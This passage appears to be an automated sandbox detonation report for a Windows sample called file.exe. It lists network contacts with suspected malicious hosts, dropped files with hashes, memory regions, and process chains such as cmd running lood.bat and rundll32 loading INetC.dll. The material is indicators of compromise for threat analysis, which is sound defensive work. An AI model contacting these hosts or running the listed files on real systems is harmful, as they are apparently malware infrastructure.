US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
DE 185.172.128.76:80 185.172.128.76 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
NL 108.156.61.176:443 d68kcn56pzfb4.cloudfront.net tcp
FR 185.93.2.251:80 download.iolo.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
GB 37.221.125.202:443 c.574859385.xyz tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:9000 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nst204E.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar2371.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 57cf2ae187a1af9e62045f02474e233c
SHA1 b85abe65755072a8812c7e62d588e7947e76fc43
SHA256 f8ae1f901af3054f1fc67d209ffcf547153af45d33fda557ff73295ec23f11c4
SHA512 1a296946e842f2fe6d7b57df76ef72a05b5dcfb26443ac18eec4bed96d30b3c79879a8816592603c420a947790fd92e08f62fafd361019e0237c28e951db89e7

C:\Users\Admin\AppData\Local\Temp\nst204E.tmp\lood.bat

MD5 b3370db0fabeb3a7d6a9221f5b03d984
SHA1 1834ce744a9498810c1964144662f3260a3cb3f8
SHA256 a222779606d0ced41e7466aa8ac266b9774f96e4f46ddf349d4ce4fa5e0a1cb1
SHA512 fd3d42ddec767a846158dfebed8a887367194b2eb994db251b1dcd4a4463616a2a08e98b0d3712d0acf017242270129468d52c0496103fff44ee3b3ea1e08bef

memory/1924-151-0x0000000002A90000-0x0000000002AD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1SAGXCOVLMJX3BUYDURD.temp

MD5 96fd4f697f40a910846373dd5d32680c
SHA1 b9782636430f7207276ca5d4293d870ad283e56d
SHA256 57b1f29475bae063077a2bc5efe3b7b933fd69befb0fd12d0168b7e7faf1c049
SHA512 749b6a6df728cd75f9b19aa1d2aa57d226cf39fa8442906f54a728efd506cc7c3e4bd786b94e04f5dc0efc963883a178ecb9f3699fa683132700d523187c3848

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 22b610eedbb3591f31508e1912ed5b01
SHA1 c2c4d4e5096927c3566f168bcf245b4a9368dbb9
SHA256 82bff5c441390a63ee744341ef0c2a0a7a02b4ae371c4edf19274cfc1fab626f
SHA512 d0e65ca7be82d766329688aa6faa54ac0f0ee1f17de5578754cd0412515f5fa989f04d764011b9fba72b0e036b517a0f6726e01c4a17d068822d7022e5c396db

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\u1rw.0.exe

MD5 be531dfdb40e97826d86e1fb73fa73c8
SHA1 12f16e6983d1c911b7ed1a485cdbe706c48d78ed
SHA256 d42d82224b04de2afe5659a7fc3ee03ba255a76f58445d10fc14093b1565b24c
SHA512 7ce943e84f69cc19bc0dca2597f74f6ed464e4b2b6935d1e63be854f5947530089045a60cf0578ac8c2df58e9e50c2bd69ce3a707090f9bb09394e01c5ae614b

memory/1396-198-0x0000000000400000-0x000000000403B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\U1RW1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u1rw.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u1rw.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u1rw.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2020-288-0x00000000741D0000-0x0000000074344000-memory.dmp

memory/2020-289-0x0000000077940000-0x0000000077AE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1rw.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

\Users\Admin\AppData\Local\Temp\u1rw.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2300-309-0x0000000000400000-0x000000000405E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 e5c68c842c00d84d552caa8954e8f3e9
SHA1 233347c66f7e098a7bed013b1525c9dd093718d8
SHA256 cba06ee3f4e1569a4faa42afccade4e6677d1c32e1a4b2fcb86410ac37d74cca
SHA512 3194f624ec13e988495212f0a468de944a9082d4f3273cbe7173b1935951311e013ed1f49c82f0bc8095a8eabe99cb8768cf379c77fa74d996c422a578d71adf

memory/2020-341-0x00000000741D0000-0x0000000074344000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\edf79e39

MD5 8ce10a8515af4d0500577f8748d16d3c
SHA1 232e9ff2779500318976df19003f763ac92c2603
SHA256 c6548b29bf858cd67f223ea669f0a2856cf62d0418e1089c64eae8ca0a911c20
SHA512 0071c7f9cc8c786a06f8de24774c6be31995a4de998f7190a834b8269b39c4f8a3d899140e3f8f50a95b000f9845bffd34f56f3e150df3d917b29decaaf4249a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56551d82a9710091a04120c7b6335ef1
SHA1 cf317b981bef895d45189a5d05002d248ca18bee
SHA256 535df74c18959bbb2125caea1d4078c2c4eff69998193b7c1db53069a9541343
SHA512 ab71d63075a3525b91647756325fda777857a3810f524bdb47efadfd825a5c3f78e3a7b259f96edbf9dab4f13bdf783358ae2ccedffec7cc9cb43bba737afbae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 29277e48cd0ee853d70528db072f1b23
SHA1 b39d7bfe12270ea4eea76817d74b1251b89b1440
SHA256 88b3e0ca21c0610285c50e4abd34c441dd9b3252acd7c1d5a6fde99e15031aa2
SHA512 1d380d825cae3e1701ae3810a3f06fb93a7e62e28c4ab6aa99033bc62a0697a2fdbb8a92f270f3fdc506c575c71118cc4397cb0e0f52d0a90a2cdb471d78a858

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 8b031b94f76fae47a90757cc7389c2d7
SHA1 7215d19c381221b4fae01a034d2a5fe447d87047
SHA256 2aae3f2ae96542a38972efa1a47f448307b147b82c3ff85856319aa603f7413b
SHA512 919e305c002133cd5edc61e73447c7d812d356f78f0c49072c0920422dad28f55653e52b92f6ca7ab7ff32518f3d50abca412f85a1bac966875d9b5bb8837231

memory/2576-442-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2164-443-0x0000000000030000-0x0000000003928000-memory.dmp

memory/2696-444-0x0000000077940000-0x0000000077AE9000-memory.dmp

memory/2164-490-0x000000001EDF0000-0x000000001EF00000-memory.dmp

memory/2164-492-0x0000000005B00000-0x0000000005B0C000-memory.dmp

memory/2164-491-0x0000000003E50000-0x0000000003E60000-memory.dmp

memory/2164-493-0x0000000005880000-0x0000000005894000-memory.dmp

memory/2164-494-0x000000001E6D0000-0x000000001E6F4000-memory.dmp

memory/2164-495-0x000000001E6F0000-0x000000001E6FA000-memory.dmp

memory/2164-496-0x000000001EA90000-0x000000001EABA000-memory.dmp

memory/2164-497-0x000000001F9F0000-0x000000001FAA2000-memory.dmp

memory/2164-498-0x0000000005800000-0x000000000587A000-memory.dmp

memory/2164-499-0x000000001DF90000-0x000000001DFF2000-memory.dmp

memory/2164-500-0x0000000005A20000-0x0000000005A2A000-memory.dmp

memory/2164-504-0x000000001FF60000-0x0000000020260000-memory.dmp

memory/2164-506-0x0000000005A40000-0x0000000005A4A000-memory.dmp

memory/2164-507-0x0000000005A40000-0x0000000005A4A000-memory.dmp

memory/2164-508-0x000000001E720000-0x000000001E72A000-memory.dmp

memory/2164-509-0x000000001EAC0000-0x000000001EAE2000-memory.dmp

memory/2164-512-0x000000001EB20000-0x000000001EB2C000-memory.dmp

memory/2164-516-0x0000000005A40000-0x0000000005A4A000-memory.dmp

memory/2164-517-0x0000000005A40000-0x0000000005A4A000-memory.dmp

memory/2696-523-0x00000000741D0000-0x0000000074344000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a34b5051478c01d83934dd5b0120757f7e5ff041b03ce291cb3621788d299269\2cde592f41d34735ab564907f4248972.tmp

MD5 10d5fa69aa94d0240f7c07b50209fd41
SHA1 630b56e0cd15179290e9992a5785f0bb8b5f44ef
SHA256 ec76540d30ef16cbbee2f0e391136197d6fb1f01e448090225be430773927440
SHA512 8d9f9219715ad086df2b49a914813732a18332ebd0506f72e2d8fa3db95acf59c8025b177c2c890db06e5e335c448eb1d26e6ef5476908bd370f1a6f665e09dd

memory/2600-532-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2600-531-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2600-530-0x0000000072EC0000-0x0000000073F22000-memory.dmp

memory/2600-533-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpF4EC.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-26 15:10

Reported

2024-04-26 15:12

Platform

win10v2004-20240419-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2828 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2828 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2828 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsp38D4.tmp\lood.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsp38D4.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-26 15:10

Reported

2024-04-26 15:12

Platform

win7-20240215-en

Max time kernel

121s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-26 15:10

Reported

2024-04-26 15:12

Platform

win10v2004-20240419-en

Max time kernel

147s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2400 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4104 -ip 4104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 g.bing.com udp

Files

N/A